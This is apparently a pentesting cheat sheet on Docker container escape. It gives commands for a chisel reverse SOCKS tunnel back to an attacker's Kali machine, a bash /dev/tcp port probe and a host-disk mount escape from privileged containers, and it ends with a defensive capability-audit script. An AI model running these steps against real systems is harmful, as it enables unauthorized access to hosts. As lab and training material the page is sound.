Docker Container Escape
Looking For Potential Files
Whenever you are in a Docker container, enumerate the system as thoroughly as you can; there is usually something interesting to find in it.
# Potential directories where you can find something interesting
/opt
/home
/home/<username>
/tmp
/var/www/html
Doing Reverse Proxy Using Chisel
We can also set up a reverse proxy using chisel. This helps when you want to connect to a MySQL or Redis database but the client tools are not installed in the Docker container: set up the reverse proxy and connect to MySQL or Redis through proxychains.
# Run the chisel server on Kali Linux first
chisel server --reverse -p 1234 --socks5
# Run the chisel client in the Docker container
./chisel client <ip of kali linux>:1234 R:socks
# Now you can use proxychains to reach services visible from the Docker container
Looking For IP Addresses
Sometimes you cannot run the ip a or ifconfig command, so you can read the following file to obtain the IP address.
cat /proc/net/fib_trie   # this sometimes shows the IP addresses of different services

Route Information
We can look up routes using the command below.
cat /proc/net/route

To convert the hexadecimal IP, we can use the Python script below.
import sys


def hex_to_ip(hex_str):
    # Split the hex string into 4 chunks of 2 characters (octets)
    octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
    # Reverse the order of octets for little-endian format
    octets.reverse()
    # Convert each octet from hex to decimal
    ip_octets = [str(int(octet, 16)) for octet in octets]
    # Join the decimal octets with dots to form an IP address
    ip_address = ".".join(ip_octets)
    return ip_address


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python hex_to_ip.py <hex_value>")
        sys.exit(1)
    hex_value = sys.argv[1]
    if len(hex_value) != 8:
        print("Error: The hex value should be 8 characters long.")
        sys.exit(1)
    ip = hex_to_ip(hex_value)
    print(f"Converted IP: {ip}")
Command To See Open Port
If you want to check whether a port is open and neither Nmap nor Netcat is available, you can run the command below (it relies on bash's /dev/tcp redirection, so it needs bash as the shell).
cat < /dev/tcp/172.18.0.1/3306

Automated Tools
Deepce
We can use the Deepce tool from the link below to enumerate Docker containers for potential escapes.
bash deepce.sh

Docker Privileged Mode Enabled
We can escalate our privileges from the Docker container to the host machine if privileged mode is turned on. In this case we can mount the host's files and folders inside the container and access them.
mkdir /mnt/host
mount /dev/xvda1 /mnt/host/
cd /mnt/host/
# now you can see the Host OS Files and Folders
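
From the defender's side, the condition this section depends on can be audited from inside a container. The following is an added example, not part of the original page: it reads the CapEff line of a /proc/<pid>/status file and reports capabilities such as CAP_SYS_ADMIN, which mount requires; the function names and both sample status texts are constructed for illustration.

```python
import re
import sys

# Capability bit numbers from linux/capability.h. Holding any of these in a
# container greatly weakens its isolation from the host.
RISKY_CAPS = {
    "CAP_DAC_READ_SEARCH": 2,
    "CAP_SYS_MODULE": 16,
    "CAP_SYS_RAWIO": 17,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,  # required by mount(2)
}


def effective_caps(status_text):
    """Return the effective capability mask from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)


def risky_caps(status_text):
    """Return the sorted names of risky capabilities present in the mask."""
    mask = effective_caps(status_text)
    return sorted(n for n, bit in RISKY_CAPS.items() if mask & (1 << bit))


def can_mount(status_text):
    """True when the process holds CAP_SYS_ADMIN and could call mount."""
    return "CAP_SYS_ADMIN" in risky_caps(status_text)


# Constructed samples: a mask resembling a default container and a mask with
# every capability bit set, as a privileged container would show.
SAMPLE_DEFAULT = "Name:\tsh\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n"
SAMPLE_PRIVILEGED = "Name:\tsh\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n"

if __name__ == "__main__":
    # Audit the current process by default, or a status file given as argument.
    path = sys.argv[1] if len(sys.argv) > 1 else "/proc/self/status"
    with open(path) as fh:
        found = risky_caps(fh.read())
    print("risky capabilities:", ", ".join(found) or "none")
    sys.exit(1 if found else 0)
```

A non-zero exit status means the container should be reviewed: drop --privileged and grant only the specific capabilities the workload needs.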
